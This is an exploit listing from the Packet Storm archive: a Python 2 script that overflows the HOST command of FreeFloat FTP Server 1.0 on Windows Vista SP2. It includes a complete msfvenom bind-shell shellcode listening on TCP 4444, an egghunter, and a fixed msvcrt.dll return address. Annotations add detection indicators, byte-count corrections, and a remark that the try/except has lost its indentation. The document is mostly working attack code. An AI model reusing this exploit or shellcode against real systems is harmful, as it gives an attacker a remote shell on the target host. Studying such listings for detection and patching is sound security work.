FreeFloat FTP Server 1.0 HOST Buffer Overflow

2017-11-06T00:00:00
ID PACKETSTORM:144891
Type packetstorm
Reporter 1N3
Modified 2017-11-06T00:00:00

Description

                                        
                                            `#!/usr/bin/python  
# Exploit Title: FreeFloat FTP Server HOST Buffer Overflow (ASLR Bypass)  
# Date: 11/05/2017  
# Exploit Author: 1N3@CrowdShield - https://crowdshield  
# Software Link: http://www.freefloat.com/software/freefloatftpserver.zip  
# Version: 1.00  
# Tested on: Windows Vista SP2 Ultimate x86 (ASLR Enabled/DEP disabled)  
# CVE : N/A  
#
# Reading note (what this listing actually does):
#   One TCP connection is opened to the FTP control port, the banner is read,
#   and a single "HOST " command is sent whose argument is built below from
#   246 padding bytes, a 4-byte address, NOP bytes, the msfvenom blob and a
#   32-byte egghunter. Nothing else is exchanged; the script then exits.
#
# Defender notes (grounded in the values in this file):
#   - The on-wire artifact is one FTP command line of 903 bytes (sum of the
#     pieces in the `buffer` line) beginning with "HOST " and a long run of
#     0x41, followed by non-printable bytes on the control channel. A simple
#     length / printable-charset rule on FTP command lines would match it.
#   - The generated payload listens on TCP/4444 (see the msfvenom line), so
#     an unexpected listener on the FTP host is the post-compromise indicator.
#   - The return address is a fixed msvcrt.dll address taken from the tested
#     Vista SP2 x86 build, and the author states DEP was disabled; the listing
#     is specific to that configuration.
#   - This is Python 2 source: print statements, and str used as a byte buffer.
  
import socket, time  
  
# CONNECT TO HOST  
# Target is hard-coded; there is no argument parsing in this script.
host = "10.0.0.39"  
port = 21  
  
# [*] Exact match at offset 246  
# (Crash-reproduction buffer used during offset discovery; kept disabled.)
#buffer = "HOST " + "\x41" * 246 + "\x42" * 4 + "\x43" * 745 + '\r\n'  
  
# AFTER CRASH (debugger register dump from the author's test run)  
#EAX 00000408  
#ECX 001FC700  
#EDX 77C45E74 ntdll.KiFastSystemCallRet  
#EBX 0000001A  
#ESP 01C7FC00 ASCII "CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC  
#EBP 016D13F0  
#ESI 0040A29E FTPServer.0040A29E  
#EDI 016D1D1F ASCII "CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC  
#EIP 42424242  
  
# !mona suggest  
# 0BADF00D [+] Examining registers  
# 0BADF00D EIP contains normal pattern : 0x41326941 (offset 246)  
# 0BADF00D ESP (0x01d4fc00) points at offset 258 in normal pattern (length 742)  
# 0BADF00D EDI (0x01741d24) points at offset 727 in normal pattern (length 273)  
  
# CALL EDI - msvcrt.dll  
#Found commands (All modules), item 5241  
# Address=77D918F6  
# Disassembly=CALL EDI  
# Module Name=C:\Windows\system32\msvcrt.dll  
  
# BIND SHELL  
# msfvenom -p windows/shell_bind_tcp LPORT=4444 -f python -b "\x0a\x00\x0d"  
# Payload size: 355 bytes + 4 byte egg = 359 bytes  
# Final size of python file: 1710 bytes  
# NOTE(review): the tag below is "T00W" written twice (8 bytes), so bind_shell
# is 8 + 355 = 363 bytes, not the 359 stated in the comment above.
# The 0x0a/0x00/0x0d exclusions in the msfvenom line match the bytes an FTP
# command line cannot carry (CR, LF, NUL).
bind_shell = "T00WT00W"  
bind_shell += "\xdd\xc2\xbf\x9a\xa8\x28\x21\xd9\x74\x24\xf4\x5d\x33"  
bind_shell += "\xc9\xb1\x53\x31\x7d\x17\x83\xc5\x04\x03\xe7\xbb\xca"  
bind_shell += "\xd4\xeb\x54\x88\x17\x13\xa5\xed\x9e\xf6\x94\x2d\xc4"  
bind_shell += "\x73\x86\x9d\x8e\xd1\x2b\x55\xc2\xc1\xb8\x1b\xcb\xe6"  
bind_shell += "\x09\x91\x2d\xc9\x8a\x8a\x0e\x48\x09\xd1\x42\xaa\x30"  
bind_shell += "\x1a\x97\xab\x75\x47\x5a\xf9\x2e\x03\xc9\xed\x5b\x59"  
bind_shell += "\xd2\x86\x10\x4f\x52\x7b\xe0\x6e\x73\x2a\x7a\x29\x53"  
bind_shell += "\xcd\xaf\x41\xda\xd5\xac\x6c\x94\x6e\x06\x1a\x27\xa6"  
bind_shell += "\x56\xe3\x84\x87\x56\x16\xd4\xc0\x51\xc9\xa3\x38\xa2"  
bind_shell += "\x74\xb4\xff\xd8\xa2\x31\x1b\x7a\x20\xe1\xc7\x7a\xe5"  
bind_shell += "\x74\x8c\x71\x42\xf2\xca\x95\x55\xd7\x61\xa1\xde\xd6"  
bind_shell += "\xa5\x23\xa4\xfc\x61\x6f\x7e\x9c\x30\xd5\xd1\xa1\x22"  
bind_shell += "\xb6\x8e\x07\x29\x5b\xda\x35\x70\x34\x2f\x74\x8a\xc4"  
bind_shell += "\x27\x0f\xf9\xf6\xe8\xbb\x95\xba\x61\x62\x62\xbc\x5b"  
bind_shell += "\xd2\xfc\x43\x64\x23\xd5\x87\x30\x73\x4d\x21\x39\x18"  
bind_shell += "\x8d\xce\xec\xb5\x85\x69\x5f\xa8\x68\xc9\x0f\x6c\xc2"  
bind_shell += "\xa2\x45\x63\x3d\xd2\x65\xa9\x56\x7b\x98\x52\x49\x20"  
bind_shell += "\x15\xb4\x03\xc8\x73\x6e\xbb\x2a\xa0\xa7\x5c\x54\x82"  
bind_shell += "\x9f\xca\x1d\xc4\x18\xf5\x9d\xc2\x0e\x61\x16\x01\x8b"  
bind_shell += "\x90\x29\x0c\xbb\xc5\xbe\xda\x2a\xa4\x5f\xda\x66\x5e"  
bind_shell += "\xc3\x49\xed\x9e\x8a\x71\xba\xc9\xdb\x44\xb3\x9f\xf1"  
bind_shell += "\xff\x6d\xbd\x0b\x99\x56\x05\xd0\x5a\x58\x84\x95\xe7"  
bind_shell += "\x7e\x96\x63\xe7\x3a\xc2\x3b\xbe\x94\xbc\xfd\x68\x57"  
bind_shell += "\x16\x54\xc6\x31\xfe\x21\x24\x82\x78\x2e\x61\x74\x64"  
bind_shell += "\x9f\xdc\xc1\x9b\x10\x89\xc5\xe4\x4c\x29\x29\x3f\xd5"  
bind_shell += "\x59\x60\x1d\x7c\xf2\x2d\xf4\x3c\x9f\xcd\x23\x02\xa6"  
bind_shell += "\x4d\xc1\xfb\x5d\x4d\xa0\xfe\x1a\xc9\x59\x73\x32\xbc"  
bind_shell += "\x5d\x20\x33\x95"  
  
# 32 BYTE EGGHUNTER  
# The 4-byte marker \x54\x30\x30\x57 ("T00W") embedded in it is the same tag
# that prefixes bind_shell above.
egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x54\x30\x30\x57\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"  
  
# CALL EDI - msvcrt.dll  
# Little-endian encoding of 0x77D918F6, the msvcrt.dll address listed in the
# mona output above; it is specific to the tested Vista SP2 x86 build.
eip = "\xF6\x18\xD9\x77"  
  
# Full command line: "HOST " (5) + 246 + eip (4) + 10 NOPs + bind_shell (363)
# + 241 NOPs + egghunter (32) + CRLF (2) = 903 bytes. Note that `buffer`
# shadows the Python 2 builtin of the same name.
buffer = "HOST " + "\x41" * 246 + eip + "\x90" * 10 + bind_shell + "\x90" * 241 + egghunter + '\r\n'  
  
# NOTE(review): every statement below is at column 0 in this listing, so the
# try/except does not parse as shown; indentation was presumably lost when the
# text was pasted. Read the five statements after `try:` as its body.
try:  
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
sock.connect((host,port))  
# Blocking read of the server banner; no timeout has been set yet, so this can
# block indefinitely if the peer accepts the connection but never writes.
print sock.recv(1024)  
sock.settimeout(10)  
  
print "Sending buffer..."  
# Dumps the raw bytes (including the shellcode) to the terminal.
print str(buffer)  
# sendto() with an explicit address on a socket that is already connect()ed;
# presumably behaves like send() on the tested platform -- not verified here.
sock.sendto(buffer, (host, port))  
print "Sent!"  
  
# Bare except: catches every exception (including KeyboardInterrupt), so the
# message below is printed for any failure, not only a refused connection.
except:  
print "socket connection failed!"  
  
# Runs whether or not the send succeeded; the socket is never closed explicitly.
time.sleep(1)  
  
print "Done!"  
`